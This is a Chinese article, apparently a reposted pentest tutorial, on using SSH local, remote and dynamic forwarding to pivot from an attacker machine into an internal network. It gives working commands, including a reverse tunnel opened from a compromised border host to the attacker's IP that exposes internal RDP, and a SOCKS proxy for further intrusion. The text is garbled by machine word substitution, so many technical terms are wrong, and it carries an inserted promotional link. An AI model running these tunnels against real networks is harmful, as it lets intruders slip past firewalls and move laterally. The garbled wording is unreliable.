关于内网中SSH协议的隧道利用方式

因为流传、行使此文所供应的信息而造成的任何直接或许间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担当何责任。

雷神众测拥有对此文章的点窜息争释权。如欲转载或流传此文章，必需包管此文章的完整性，包罗版权声明等悉数内容。未经雷神众测许可，不得随意点窜或许增减此文章内容，不得以任何体式将其用于贸易目的。

[好文分享：www.ii77.com]

内网中大部门linux办事器与收集设备都支撑ssh和谈，并且大部门ssh和谈是可以经由防火墙与界限设备，所以冲击者无法行使其他和谈转发代理内网流量时，能够考虑测验使用ssh和谈。这里首要以常见的内陆转发、长途转发、动态转发为案例

长途转发

在长途主机上监听一个端口，所有长途主机指定的数据都邑经由ssh地道传输到内陆主机的对应端口

能够发现内陆转发与长途转发有些雷同，除了端口转发时的分歧，实际的应用场景也各不沟通
内陆转发--冲击机可接见内网界限，内网界限可接见内网办事，但冲击机无法直接接见内网办事，冲击者以内陆端口以内网界限的身份接见内网办事
长途转发--冲击机无法接见内网界限及办事，但内网界限可接见冲击机，冲击机接见内网办事时就会经由冲击机与内网界限竖立的ssh地道以内网界限的名义进行接见

动态转发

内陆和长途端口转发都限制了方针办事器以及方针办事器的端口，而动态端口转发，冲击机把内网界限作为本身的代理，不限制方针办事器及其端口。冲击机和内网界限之间的所有保持都是基于加密的ssh

常见ssh号令如下

ssh root@192.168.3.131
参数解说：
-C：压缩传输，提高传输速度
-f：将ssh传输转入后台执行，不占用当前的Shell
-N：竖立静默保持（竖立了保持，然则看不到具体味话）
-g：许可长途主机保持内陆用于转发的端口
-L：内陆端口转发
-R：长途端口转发
-D：动态转发（socks代理）
-P：指定ssh端口

查察13389端口是否保持：

接见冲击机的13389端口即可接入内网web办事器的3389端口：

当保持192.168.3.131的13389端口时，经由ssh和谈与界限跳板192.168.3.134保持，然后10.10.10.130发送响应流量保持至内网10.10.10.128
冲击机 随机端口与界限跳板相保持

界限跳板 内网随机端口与内网web3389保持

内网web 3389端口与界限跳板保持

冲击机：192.168.3.131
内网界限：10.10.10.131
内网web：10.10.10.128
这里注重，冲击机不克接见内网机械，内网界限可接见外网冲击机（能够从内网界限ssh到冲击机上），但内网web办事器不克接见冲击机
以内网界限为跳板，将192.168.3.131的33389端口流量转发到内网web的3389端口，接见33389端口就能够接见内网web的3389的长途桌面
内网界限执行如下号令：
ssh -CfNg -R 33389:10.10.10.128:3389 root@192.168.3.131
33389（冲击机端口） 10.10.10.128（方针主机） 3389（方针端口） 192.168.3.131（冲击机IP）

冲击机内如下接入：
rdesktop 127.0.0.1:33389

冲击机 22端口与内网界限相保持，内网出来的流量均会议22端口进行传输

内网界限 内网界限是能够接见冲击机的，此时界限随机端口将会保持冲击机的22端口

内网web 与界限随机端口竖立保持

冲击机：192.168.3.131
内网界限：192.168.3.134 10.10.10.131
内网web：10.10.10.128
在冲击机上执行如下，建立socks代理，需要内网界限的暗码：
ssh -CfNg -D 60011 root@192.168.3.134
60011（socks代理的端口，后期以冲击机的ip与该60011端口接入内网即可）

浏览器设置代理，接入内网web资源（此次非内网界限）：

同样能够以此代理地址将其他对象接入内网，进一步内网渗透，在此不再赘述

注：本文由E平安编译报道，转载请注原文地址 

https://www.easyaq.com

▼点击“阅读原文” 查察更多出色内容

喜欢记得打赏小E哦！